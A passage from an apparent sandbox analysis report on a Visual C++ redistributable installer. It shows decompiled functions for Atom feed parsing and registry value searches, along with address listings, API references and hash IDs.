																					__eflags = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"link", 0xffffffff) - 2;
																					if(__eflags != 0) {
																						_t64 = _t160 + 0x44; // 0x44
																						_t128 = E000579CC(_t151, __eflags, _v12, _t64);
																						goto L39;
																					} else {
																						_t161 = E000576A1(_v12,  *((intOrPtr*)(_t160 + 0x3c)) + _t161);
																						__eflags = _t161;
																						if(_t161 >= 0) {
																							_v28 = _v28 + 0x28;
																							goto L40;
																						}
																					}
																				} else {
																					_t161 = E00056FB7(_v12,  *((intOrPtr*)(_t160 + 0x34)) + _v24);
																					__eflags = _t161;
																					if(_t161 >= 0) {
																						_v24 = _v24 + 0x40;
																						goto L40;
																					}
																				}
																			} else {
																				_t161 = E00056BF6(_v12,  *((intOrPtr*)(_t160 + 0x2c)) + _v20);
																				__eflags = _t161;
																				if(_t161 >= 0) {
																					_v20 = _v20 + 0x10;
																					goto L40;
																				}
																			}
																		} else {
																			_t161 = E00056ACD(_v12,  *((intOrPtr*)(_t160 + 0x24)) + _a4);
																			__eflags = _t161;
																			if(_t161 >= 0) {
																				_a4 = _a4 + 0xc;
																				goto L40;
																			}
																		}
																	} else {
																		_t40 = _t160 + 0x18; // 0x18
																		_t128 = E00056754(_t158, _t40, _v12);
																		goto L39;
																	}
																} else {
																	_t37 = _t160 + 0x14; // 0x14
																	_t147 = _t37;
																	goto L15;
																}
															} else {
																_t35 = _t160 + 0x10; // 0x10
																_t147 = _t35;
																goto L15;
															}
														} else {
															_t33 = _t160 + 0xc; // 0xc
															_t147 = _t33;
															goto L15;
														}
													} else {
														_t31 = _t160 + 8; // 0x8
														_t147 = _t31;
														goto L15;
													}
												} else {
													_t28 = _t160 + 4; // 0x4
													_t147 = _t28;
													L15:
													_push(_v12);
													_push(_t147);
													goto L12;
												}
												goto L56;
											}
										}
									}
								}
							}
						}
					}
					L56:
					_pop(_t149);
				} else {
					_t161 = 0x8007000e;
					E000137D3(_t89, "atomutil.cpp", 0x134, 0x8007000e);
				}
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t153 = _v12;
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
				}
				_t154 = _v16;
				if(_t154 != 0) {
					 *((intOrPtr*)( *_t154 + 8))(_t154);
				}
				if(_t160 != 0) {
					E00057B68(_t149, _t160, _t160);
				}
				return _t161;
			}
































                                                                          0x000572f4
                                                                          0x00057302
                                                                          0x00057305
                                                                          0x00057308
                                                                          0x00057310
                                                                          0x00057314
                                                                          0x00057331
                                                                          0x00057334
                                                                          0x0005733a
                                                                          0x0005733d
                                                                          0x00057341
                                                                          0x00057350
                                                                          0x00057352
                                                                          0x00057354
                                                                          0x0005735a
                                                                          0x0005735e
                                                                          0x0005736d
                                                                          0x0005736f
                                                                          0x00057371
                                                                          0x00057377
                                                                          0x0005737b
                                                                          0x0005738a
                                                                          0x0005738c
                                                                          0x0005738e
                                                                          0x00057394
                                                                          0x00057398
                                                                          0x000573a7
                                                                          0x000573a9
                                                                          0x000573ab
                                                                          0x000573b3
                                                                          0x000573bb
                                                                          0x000573bd
                                                                          0x000573bf
                                                                          0x000573d0
                                                                          0x000573d5
                                                                          0x000573d7
                                                                          0x000573d9
                                                                          0x00057605
                                                                          0x00057605
                                                                          0x00057608
                                                                          0x0005760a
                                                                          0x0005764c
                                                                          0x0005764c
                                                                          0x00057651
                                                                          0x00057652
                                                                          0x00000000
                                                                          0x0005760c
                                                                          0x0005760e
                                                                          0x00057611
                                                                          0x00000000
                                                                          0x00057613
                                                                          0x00057613
                                                                          0x00057616
                                                                          0x00057618
                                                                          0x0005763f
                                                                          0x0005763f
                                                                          0x00057644
                                                                          0x00057645
                                                                          0x00000000
                                                                          0x0005761a
                                                                          0x0005761a
                                                                          0x0005761d
                                                                          0x00000000
                                                                          0x0005761f
                                                                          0x0005761f
                                                                          0x00057622
                                                                          0x00057636
                                                                          0x00057639
                                                                          0x0005763b
                                                                          0x00057624
                                                                          0x00057624
                                                                          0x00057627
                                                                          0x00000000
                                                                          0x00057629
                                                                          0x00057629
                                                                          0x0005762e
                                                                          0x0005762f
                                                                          0x00057657
                                                                          0x00057657
                                                                          0x0005765c
                                                                          0x0005765e
                                                                          0x0005765e
                                                                          0x00057627
                                                                          0x00057622
                                                                          0x0005761d
                                                                          0x00057618
                                                                          0x00057611
                                                                          0x000573df
                                                                          0x000573df
                                                                          0x000573e5
                                                                          0x000573e8
                                                                          0x000573eb
                                                                          0x000573ee
                                                                          0x000573f8
                                                                          0x00057407
                                                                          0x00057409
                                                                          0x0005740c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005740e
                                                                          0x00057411
                                                                          0x00057412
                                                                          0x00057412
                                                                          0x000575bd
                                                                          0x000575bd
                                                                          0x000575bf
                                                                          0x000575c1
                                                                          0x000575c7
                                                                          0x000575c7
                                                                          0x000575cb
                                                                          0x000575d0
                                                                          0x000575d6
                                                                          0x000575d6
                                                                          0x000575d6
                                                                          0x000575d6
                                                                          0x000575da
                                                                          0x000575dd
                                                                          0x000575df
                                                                          0x000575e4
                                                                          0x000575e7
                                                                          0x000575e7
                                                                          0x000575e7
                                                                          0x000575e7
                                                                          0x000575fb
                                                                          0x000575fd
                                                                          0x000575ff
                                                                          0x000573f3
                                                                          0x000573f6
                                                                          0x000573f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000575ff
                                                                          0x00000000
                                                                          0x0005741c
                                                                          0x0005742c
                                                                          0x0005742e
                                                                          0x00057431
                                                                          0x0005744c
                                                                          0x0005744e
                                                                          0x00057451
                                                                          0x00057468
                                                                          0x0005746a
                                                                          0x0005746d
                                                                          0x00057484
                                                                          0x00057486
                                                                          0x00057489
                                                                          0x000574a0
                                                                          0x000574a2
                                                                          0x000574a5
                                                                          0x000574bc
                                                                          0x000574be
                                                                          0x000574c1
                                                                          0x000574e4
                                                                          0x000574e6
                                                                          0x000574e9
                                                                          0x0005751d
                                                                          0x0005751f
                                                                          0x00057522
                                                                          0x00057556
                                                                          0x00057558
                                                                          0x0005755b
                                                                          0x0005758e
                                                                          0x00057591
                                                                          0x000575b1
                                                                          0x000575b8
                                                                          0x00000000
                                                                          0x00057593
                                                                          0x000575a1
                                                                          0x000575a3
                                                                          0x000575a5
                                                                          0x000575ab
                                                                          0x00000000
                                                                          0x000575ab
                                                                          0x000575a5
                                                                          0x0005755d
                                                                          0x0005756c
                                                                          0x0005756e
                                                                          0x00057570
                                                                          0x00057576
                                                                          0x00000000
                                                                          0x00057576
                                                                          0x00057570
                                                                          0x00057524
                                                                          0x00057533
                                                                          0x00057535
                                                                          0x00057537
                                                                          0x0005753d
                                                                          0x00000000
                                                                          0x0005753d
                                                                          0x00057537
                                                                          0x000574eb
                                                                          0x000574fa
                                                                          0x000574fc
                                                                          0x000574fe
                                                                          0x00057504
                                                                          0x00000000
                                                                          0x00057504
                                                                          0x000574fe
                                                                          0x000574c3
                                                                          0x000574c6
                                                                          0x000574ca
                                                                          0x00000000
                                                                          0x000574ca
                                                                          0x000574a7
                                                                          0x000574a7
                                                                          0x000574a7
                                                                          0x00000000
                                                                          0x000574a7
                                                                          0x0005748b
                                                                          0x0005748b
                                                                          0x0005748b
                                                                          0x00000000
                                                                          0x0005748b
                                                                          0x0005746f
                                                                          0x0005746f
                                                                          0x0005746f
                                                                          0x00000000
                                                                          0x0005746f
                                                                          0x00057453
                                                                          0x00057453
                                                                          0x00057453
                                                                          0x00000000
                                                                          0x00057453
                                                                          0x00057433
                                                                          0x00057433
                                                                          0x00057433
                                                                          0x00057436
                                                                          0x00057436
                                                                          0x00057439
                                                                          0x00000000
                                                                          0x00057439
                                                                          0x00000000
                                                                          0x00057431
                                                                          0x000573f8
                                                                          0x000573d9
                                                                          0x000573bf
                                                                          0x000573ab
                                                                          0x0005738e
                                                                          0x00057371
                                                                          0x00057663
                                                                          0x00057663
                                                                          0x00057316
                                                                          0x00057316
                                                                          0x00057326
                                                                          0x00057326
                                                                          0x00057668
                                                                          0x0005766d
                                                                          0x0005766d
                                                                          0x00057673
                                                                          0x00057678
                                                                          0x0005767d
                                                                          0x0005767d
                                                                          0x00057680
                                                                          0x00057685
                                                                          0x0005768a
                                                                          0x0005768a
                                                                          0x0005768f
                                                                          0x00057692
                                                                          0x00057692
                                                                          0x0005769e

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 00057407
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000575D0
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005766D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$FreeHeap$AllocateCompareProcess
                                                                          • String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                          • API String ID: 1555028553-2592408802
                                                                          • Opcode ID: 99b906ae6dacf6b4eef9bce86bcc0eeab38705e30f7b11917d2dbea9d1a7a8ae
                                                                          • Instruction ID: 7f54cedfa4dae5c66fd6cf1d843bc8fdb1f829a460e72e4a63e6127afe162dc0
                                                                          • Opcode Fuzzy Hash: 99b906ae6dacf6b4eef9bce86bcc0eeab38705e30f7b11917d2dbea9d1a7a8ae
                                                                          • Instruction Fuzzy Hash: F7B1C631D08616BBCB219B54DC41FAF76B8AB04721F604354FA29AB2D1D771EE44EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001A311 Relevance: 45.8, APIs: 8, Strings: 18, Instructions: 299registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E0001A311(long _a4, intOrPtr _a8) {
				int _v8;
				char _v12;
				int _v16;
				int _v20;
				int _v24;
				intOrPtr _v32;
				void _v48;
				signed short _t79;
				signed short _t85;
				void* _t87;
				void* _t89;
				void* _t103;
				long _t106;
				signed short _t110;
				void* _t114;
				WCHAR* _t131;
				signed int _t132;
				long _t143;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t158;
				void* _t159;

				_t132 = 6;
				memset( &_v48, 0, _t132 << 2);
				_t159 = _t158 + 0xc;
				_t143 = _a4;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t131 = 0;
				_t72 =  ==  ? 1 : 0x101;
				_v24 = 0;
				_a4 =  ==  ? 1 : 0x101;
				_v8 = 0;
				if(E000171CF(_a8,  *((intOrPtr*)(_t143 + 0x1c)),  &_v12, 0) >= 0) {
					if( *((intOrPtr*)(_t143 + 0x20)) == 0) {
						L5:
						_t145 = E00050E3F( *((intOrPtr*)(_t143 + 0x18)), _v12, _a4,  &_v16);
						if(_t145 != 0x80070002) {
							if(_t145 >= 0) {
								_t79 = RegQueryValueExW(_v16, _v20, 0,  &_v24, 0,  &_v8);
								if(_t79 != 2) {
									if(_t79 == 0) {
										_t131 = E000138D4(_v8 + 2, 1);
										if(_t131 != 0) {
											_t85 = RegQueryValueExW(_v16, _v20, 0,  &_v24, _t131,  &_v8);
											if(_t85 == 0) {
												_t87 = _v24 - 1;
												if(_t87 == 0) {
													L38:
													_t89 = E000302F4( &_v48, _t131, 0);
													goto L39;
												} else {
													_t103 = _t87 - 1;
													if(_t103 == 0) {
														if( *((intOrPtr*)(_t143 + 0x28)) == 0) {
															goto L38;
														} else {
															_t147 = E00011EDE( &_v48, _v8);
															if(_t147 >= 0) {
																_v32 = 2;
																_t106 = ExpandEnvironmentStringsW(_t131, _v48, _v8);
																_a4 = _t106;
																if(_t106 <= _v8) {
																	goto L40;
																} else {
																	_t148 = E00011EDE( &_v48, _t106);
																	if(_t148 < 0) {
																		goto L33;
																	} else {
																		if(_a4 == ExpandEnvironmentStringsW(_t131, _v48, _a4)) {
																			goto L40;
																		} else {
																			_t110 = GetLastError();
																			_t151 =  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
																			_t148 =  >=  ? 0x80004005 :  <=  ? _t110 : _t110 & 0x0000ffff | 0x80070000;
																			E000137D3(0x80004005, "search.cpp", 0x396, _t148);
																			_push("Failed to get expand environment string.");
																			goto L46;
																		}
																	}
																}
															} else {
																L33:
																_push("Failed to allocate string buffer.");
																goto L46;
															}
														}
													} else {
														_t114 = _t103;
														if(_t114 == 0) {
															if(_v8 != 4) {
																goto L26;
															} else {
																asm("cdq");
																_push(0);
																_push( *_t131);
																goto L28;
															}
														} else {
															if(_t114 == 7) {
																if(_v8 == 8) {
																	_push(_t131[2]);
																	_push( *_t131);
																	L28:
																	_push( &_v48);
																	_t89 = E000302B0();
																	L39:
																	_t147 = _t89;
																	L40:
																	if(_t147 >= 0) {
																		_t148 = E0002FEB7(0,  &_v48,  *((intOrPtr*)(_t143 + 0x14)));
																		if(_t148 >= 0) {
																			_t148 = E00018137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48);
																			if(_t148 < 0) {
																				_push("Failed to set variable.");
																				goto L46;
																			}
																		} else {
																			_push("Failed to change value type.");
																			goto L46;
																		}
																	} else {
																		_push("Failed to read registry value.");
																		goto L46;
																	}
																} else {
																	L26:
																	_t148 = 0x8000ffff;
																	goto L47;
																}
															} else {
																_t148 = 0x80004001;
																E0005012F(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v24);
																_t159 = _t159 + 0xc;
																goto L47;
															}
														}
													}
												}
											} else {
												_t154 =  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
												_t148 =  >=  ? 0x80004005 :  <=  ? _t85 : _t85 & 0x0000ffff | 0x80070000;
												E000137D3(0x80004005, "search.cpp", 0x375, _t148);
												_push("Failed to query registry key value.");
												goto L46;
											}
										} else {
											_t148 = 0x8007000e;
											E000137D3(_t82, "search.cpp", 0x372, 0x8007000e);
											_push("Failed to allocate memory registry value.");
											_push(0x8007000e);
											E0005012F();
											goto L47;
										}
									} else {
										_t157 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
										_t148 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "search.cpp", 0x36f, _t148);
										_push("Failed to query registry key value size.");
										goto L46;
									}
								} else {
									_push(_v20);
									E0005061A(_t79, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v12);
									_t159 = _t159 + 0x10;
									goto L7;
								}
							} else {
								_push("Failed to open registry key.");
								goto L46;
							}
						} else {
							E0005061A(2, "Registry key not found. Key = \'%ls\'", _v12);
							_t159 = _t159 + 0xc;
							L7:
							_t148 = E00018137(_a8,  *((intOrPtr*)(_t143 + 4)),  &_v48);
							if(_t148 >= 0) {
								_t148 = 0;
							} else {
								_push("Failed to clear variable.");
								goto L46;
							}
						}
					} else {
						_t148 = E000171CF(_a8,  *((intOrPtr*)(_t143 + 0x20)),  &_v20, 0);
						if(_t148 >= 0) {
							goto L5;
						} else {
							_push("Failed to format value string.");
							goto L46;
						}
					}
				} else {
					_push("Failed to format key string.");
					L46:
					_push(_t148);
					E0005012F();
					if(_t148 < 0) {
						L47:
						_push(_t148);
						E0005061A(2, "RegistrySearchValue failed: ID \'%ls\', HRESULT 0x%x", _v12);
					}
				}
				E00012793(_v12);
				E00012793(_v20);
				if(_v16 != 0) {
					RegCloseKey(_v16);
					_v16 = _v16 & 0x00000000;
				}
				if(_t131 != 0) {
					E00013999(_t131);
				}
				E00030499( &_v48);
				return _t148;
			}


























                                                                          0x0001a31c
                                                                          0x0001a322
                                                                          0x0001a322
                                                                          0x0001a324
                                                                          0x0001a32b
                                                                          0x0001a32f
                                                                          0x0001a337
                                                                          0x0001a33d
                                                                          0x0001a340
                                                                          0x0001a343
                                                                          0x0001a346
                                                                          0x0001a350
                                                                          0x0001a35f
                                                                          0x0001a36e
                                                                          0x0001a391
                                                                          0x0001a3a3
                                                                          0x0001a3ab
                                                                          0x0001a3e7
                                                                          0x0001a40b
                                                                          0x0001a410
                                                                          0x0001a42a
                                                                          0x0001a46c
                                                                          0x0001a470
                                                                          0x0001a4aa
                                                                          0x0001a4ae
                                                                          0x0001a4e5
                                                                          0x0001a4e8
                                                                          0x0001a5e2
                                                                          0x0001a5e9
                                                                          0x00000000
                                                                          0x0001a4ee
                                                                          0x0001a4ee
                                                                          0x0001a4f1
                                                                          0x0001a54d
                                                                          0x00000000
                                                                          0x0001a553
                                                                          0x0001a55f
                                                                          0x0001a563
                                                                          0x0001a572
                                                                          0x0001a57d
                                                                          0x0001a583
                                                                          0x0001a589
                                                                          0x00000000
                                                                          0x0001a58b
                                                                          0x0001a595
                                                                          0x0001a599
                                                                          0x00000000
                                                                          0x0001a59b
                                                                          0x0001a5ab
                                                                          0x00000000
                                                                          0x0001a5ad
                                                                          0x0001a5ad
                                                                          0x0001a5be
                                                                          0x0001a5c8
                                                                          0x0001a5d6
                                                                          0x0001a5db
                                                                          0x00000000
                                                                          0x0001a5db
                                                                          0x0001a5ab
                                                                          0x0001a599
                                                                          0x0001a565
                                                                          0x0001a565
                                                                          0x0001a565
                                                                          0x00000000
                                                                          0x0001a565
                                                                          0x0001a563
                                                                          0x0001a4f3
                                                                          0x0001a4f4
                                                                          0x0001a4f7
                                                                          0x0001a540
                                                                          0x00000000
                                                                          0x0001a542
                                                                          0x0001a544
                                                                          0x0001a545
                                                                          0x0001a546
                                                                          0x00000000
                                                                          0x0001a546
                                                                          0x0001a4f9
                                                                          0x0001a4fc
                                                                          0x0001a51d
                                                                          0x0001a529
                                                                          0x0001a52c
                                                                          0x0001a52e
                                                                          0x0001a531
                                                                          0x0001a532
                                                                          0x0001a5ee
                                                                          0x0001a5ee
                                                                          0x0001a5f0
                                                                          0x0001a5f2
                                                                          0x0001a607
                                                                          0x0001a60b
                                                                          0x0001a623
                                                                          0x0001a627
                                                                          0x0001a629
                                                                          0x00000000
                                                                          0x0001a629
                                                                          0x0001a60d
                                                                          0x0001a60d
                                                                          0x00000000
                                                                          0x0001a60d
                                                                          0x0001a5f4
                                                                          0x0001a5f4
                                                                          0x00000000
                                                                          0x0001a5f4
                                                                          0x0001a51f
                                                                          0x0001a51f
                                                                          0x0001a51f
                                                                          0x00000000
                                                                          0x0001a51f
                                                                          0x0001a4fe
                                                                          0x0001a501
                                                                          0x0001a50c
                                                                          0x0001a511
                                                                          0x00000000
                                                                          0x0001a511
                                                                          0x0001a4fc
                                                                          0x0001a4f7
                                                                          0x0001a4f1
                                                                          0x0001a4b0
                                                                          0x0001a4bb
                                                                          0x0001a4c5
                                                                          0x0001a4d3
                                                                          0x0001a4d8
                                                                          0x00000000
                                                                          0x0001a4d8
                                                                          0x0001a472
                                                                          0x0001a472
                                                                          0x0001a482
                                                                          0x0001a487
                                                                          0x0001a48c
                                                                          0x0001a48d
                                                                          0x00000000
                                                                          0x0001a493
                                                                          0x0001a42c
                                                                          0x0001a437
                                                                          0x0001a441
                                                                          0x0001a44f
                                                                          0x0001a454
                                                                          0x00000000
                                                                          0x0001a454
                                                                          0x0001a412
                                                                          0x0001a412
                                                                          0x0001a41e
                                                                          0x0001a423
                                                                          0x00000000
                                                                          0x0001a423
                                                                          0x0001a3e9
                                                                          0x0001a3e9
                                                                          0x00000000
                                                                          0x0001a3e9
                                                                          0x0001a3ad
                                                                          0x0001a3b7
                                                                          0x0001a3bc
                                                                          0x0001a3bf
                                                                          0x0001a3ce
                                                                          0x0001a3d2
                                                                          0x0001a3de
                                                                          0x0001a3d4
                                                                          0x0001a3d4
                                                                          0x00000000
                                                                          0x0001a3d4
                                                                          0x0001a3d2
                                                                          0x0001a370
                                                                          0x0001a381
                                                                          0x0001a385
                                                                          0x00000000
                                                                          0x0001a387
                                                                          0x0001a387
                                                                          0x00000000
                                                                          0x0001a387
                                                                          0x0001a385
                                                                          0x0001a361
                                                                          0x0001a361
                                                                          0x0001a62e
                                                                          0x0001a62e
                                                                          0x0001a62f
                                                                          0x0001a638
                                                                          0x0001a63a
                                                                          0x0001a63a
                                                                          0x0001a645
                                                                          0x0001a64a
                                                                          0x0001a638
                                                                          0x0001a650
                                                                          0x0001a658
                                                                          0x0001a661
                                                                          0x0001a666
                                                                          0x0001a66c
                                                                          0x0001a66c
                                                                          0x0001a672
                                                                          0x0001a675
                                                                          0x0001a675
                                                                          0x0001a67e
                                                                          0x0001a68b

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A356
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001A37C
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0001A666
                                                                          Strings
                                                                          • Failed to query registry key value., xrefs: 0001A4D8
                                                                          • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0001A418
                                                                          • Failed to allocate string buffer., xrefs: 0001A565
                                                                          • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0001A63E
                                                                          • Failed to open registry key., xrefs: 0001A3E9
                                                                          • Failed to clear variable., xrefs: 0001A3D4
                                                                          • Failed to query registry key value size., xrefs: 0001A454
                                                                          • Unsupported registry key value type. Type = '%u', xrefs: 0001A506
                                                                          • Failed to get expand environment string., xrefs: 0001A5DB
                                                                          • Failed to format key string., xrefs: 0001A361
                                                                          • Failed to read registry value., xrefs: 0001A5F4
                                                                          • Failed to format value string., xrefs: 0001A387
                                                                          • Failed to set variable., xrefs: 0001A629
                                                                          • Registry key not found. Key = '%ls', xrefs: 0001A3B0
                                                                          • Failed to change value type., xrefs: 0001A60D
                                                                          • search.cpp, xrefs: 0001A44A, 0001A47D, 0001A4CE, 0001A5D1
                                                                          • Failed to allocate memory registry value., xrefs: 0001A487
                                                                          • @Met, xrefs: 0001A5AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16$Close
                                                                          • String ID: @Met$Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                          • API String ID: 2348241696-68201321
                                                                          • Opcode ID: 686517b824e4af06f7742d526c258bd4be287a7331798e5d07d405fcc544d66b
                                                                          • Instruction ID: 250ed57aef95487a1e43ccac6dbf0b565b80ca29cd9b7274e734ab26a6c8a048
                                                                          • Opcode Fuzzy Hash: 686517b824e4af06f7742d526c258bd4be287a7331798e5d07d405fcc544d66b
                                                                          • Instruction Fuzzy Hash: 41A1F672E41629BBDF229AE4CC05BEF7AB9AF05311F108121FD04BA151D771DE84D7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00056FB7 Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E00056FB7(signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				int _t104;
				int _t105;
				int _t106;
				int _t107;
				int _t108;
				int _t109;
				int _t110;
				signed int _t113;
				signed int* _t128;
				signed int* _t129;
				signed int _t130;
				void* _t131;
				signed int _t133;
				signed int _t134;
				signed int* _t139;
				signed int _t140;

				_t130 = _a4;
				_t139 = _a8;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t139[0xe] = _t130;
				 *((intOrPtr*)( *_t130 + 4))(_t130);
				_t140 = E000564F4( &(_t139[9]), _t130, L"author",  &(_t139[9]),  &(_t139[8]));
				if(_t140 >= 0) {
					_t140 = E0005658C( &(_t139[0xb]), _t130, L"category",  &(_t139[0xb]),  &(_t139[0xa]));
					if(_t140 >= 0) {
						_t140 = E000566BC( &(_t139[0xd]), _t130, L"link",  &(_t139[0xd]),  &(_t139[0xc]));
						if(_t140 >= 0) {
							_t137 =  &_v16;
							_t140 =  *((intOrPtr*)( *_t130 + 0x30))(_t130,  &_v16);
							if(_t140 >= 0) {
								_t140 = E00053760( &_v16, _v16,  &_v12,  &_v8);
								if(_t140 != 0) {
									L42:
									if(__eflags >= 0) {
										_t99 =  *_t139;
										__eflags = _t99;
										if(_t99 == 0) {
											L52:
											_t100 = 0x8007000d;
											_push(0x8007000d);
											_push(0x311);
											goto L53;
										} else {
											__eflags =  *_t99;
											if( *_t99 == 0) {
												goto L52;
											} else {
												_t102 = _t139[2];
												__eflags = _t102;
												if(_t102 == 0) {
													L51:
													_t100 = 0x8007000d;
													_push(0x8007000d);
													_push(0x316);
													goto L53;
												} else {
													__eflags =  *_t102;
													if( *_t102 == 0) {
														goto L51;
													} else {
														__eflags = _t139[6];
														if(_t139[6] != 0) {
															L50:
															_t140 = 0;
														} else {
															__eflags = _t139[5];
															if(_t139[5] != 0) {
																goto L50;
															} else {
																_t100 = 0x8007000d;
																_push(0x8007000d);
																_push(0x31b);
																L53:
																_t140 = _t100;
																goto L54;
															}
														}
													}
												}
											}
										}
									}
								} else {
									_a8 = _a8 & _t140;
									_a4 = _a4 & _t140;
									_t131 = CompareStringW;
									_v20 = _t140;
									L6:
									while(1) {
										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, 0x73c78, 0xffffffff) != 2) {
											_t104 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"summary", 0xffffffff);
											__eflags = _t104 - 2;
											if(_t104 != 2) {
												_t105 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"title", 0xffffffff);
												__eflags = _t105 - 2;
												if(_t105 != 2) {
													_t106 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"published", 0xffffffff);
													__eflags = _t106 - 2;
													if(_t106 != 2) {
														_t107 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"updated", 0xffffffff);
														__eflags = _t107 - 2;
														if(_t107 != 2) {
															_t108 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"author", 0xffffffff);
															__eflags = _t108 - 2;
															if(_t108 != 2) {
																_t109 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"category", 0xffffffff);
																__eflags = _t109 - 2;
																if(_t109 != 2) {
																	_t110 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"content", 0xffffffff);
																	__eflags = _t110 - 2;
																	if(_t110 != 2) {
																		__eflags = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"link", 0xffffffff) - 2;
																		if(__eflags != 0) {
																			_t113 = E000579CC(_t131, __eflags, _v12,  &(_t139[0xf]));
																			goto L33;
																		} else {
																			_t140 = E000576A1(_v12, _t139[0xd] + _t140);
																			__eflags = _t140;
																			if(_t140 >= 0) {
																				_v20 = _v20 + 0x28;
																				goto L34;
																			}
																		}
																	} else {
																		__eflags = _t139[7];
																		if(_t139[7] != 0) {
																			_t140 = 0x8000ffff;
																		} else {
																			_t100 = E000138D4(0x10, 1);
																			_t139[7] = _t100;
																			__eflags = _t100;
																			if(_t100 == 0) {
																				_t140 = 0x8007000e;
																				_push(0x8007000e);
																				_push(0x2f7);
																				L54:
																				_push("atomutil.cpp");
																				E000137D3(_t100);
																			} else {
																				_t113 = E00056DA8(_v12, _t100);
																				goto L33;
																			}
																		}
																	}
																} else {
																	_t140 = E00056BF6(_v12, _t139[0xb] + _a8);
																	__eflags = _t140;
																	if(_t140 >= 0) {
																		_a8 = _a8 + 0x10;
																		goto L34;
																	}
																}
															} else {
																_t140 = E00056ACD(_v12, _t139[9] + _a4);
																__eflags = _t140;
																if(_t140 >= 0) {
																	_a4 = _a4 + 0xc;
																	goto L34;
																}
															}
														} else {
															_t128 =  &(_t139[5]);
															goto L16;
														}
													} else {
														_t128 =  &(_t139[3]);
														L16:
														_t113 = E00056754(_t137, _t128, _v12);
														goto L33;
													}
												} else {
													_t129 =  &(_t139[2]);
													goto L11;
												}
											} else {
												_t129 =  &(_t139[1]);
												L11:
